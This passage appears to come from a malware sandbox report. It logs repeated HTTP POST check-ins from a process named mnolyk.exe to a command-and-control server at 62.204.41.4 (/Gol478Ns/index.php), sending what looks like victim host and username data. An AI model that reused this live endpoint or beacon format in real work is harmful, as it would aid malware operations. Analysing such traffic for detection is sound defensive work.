                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.459940910 CET | 607 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        407 | 192.168.2.5 | 50097 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:38.635756969 CET | 608 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.701345921 CET | 608 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        408 | 192.168.2.5 | 50098 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:38.869061947 CET | 608 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:38.933482885 CET | 609 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        409 | 192.168.2.5 | 50099 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:39.101682901 CET | 610 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.167921066 CET | 610 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        41 | 192.168.2.5 | 49731 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:47.855990887 CET | 242 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:47.920581102 CET | 242 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        410 | 192.168.2.5 | 50100 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:39.335819006 CET | 611 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.400489092 CET | 611 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        411 | 192.168.2.5 | 50101 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:39.586155891 CET | 612 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.652388096 CET | 612 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        412 | 192.168.2.5 | 50102 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:39.827580929 CET | 613 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:39.894838095 CET | 613 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        413 | 192.168.2.5 | 50103 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:40.079576015 CET | 613 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.146662951 CET | 614 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        414 | 192.168.2.5 | 50104 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:40.328929901 CET | 615 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.394458055 CET | 615 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        415 | 192.168.2.5 | 50105 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:40.574553013 CET | 616 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.639194012 CET | 616 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        416 | 192.168.2.5 | 50106 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:40.803738117 CET | 617 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:40.869002104 CET | 617 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        417 | 192.168.2.5 | 50107 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:41.040652037 CET | 618 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.106904030 CET | 618 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        418 | 192.168.2.5 | 50108 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:41.274400949 CET | 619 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.340738058 CET | 619 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        419         192.168.2.5  50109        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:41.581873894 CET  620                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.645371914 CET  620                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        42          192.168.2.5  49732        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:16:48.097239017 CET  243                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:48.171710014 CET  243                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        420         192.168.2.5  50110        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:41.820358038 CET  621                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:41.886085033 CET  621                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        421         192.168.2.5  50111        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:42.055399895 CET  622                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.125121117 CET  622                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        422         192.168.2.5  50112        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:42.306782961 CET  623                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.372473955 CET  623                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                        423         192.168.2.5  50113        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp                           kBytes transferred  Direction  Data
                                                        Feb 6, 2023 14:18:42.545396090 CET  623                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:42.608891010 CET  624                 IN         HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
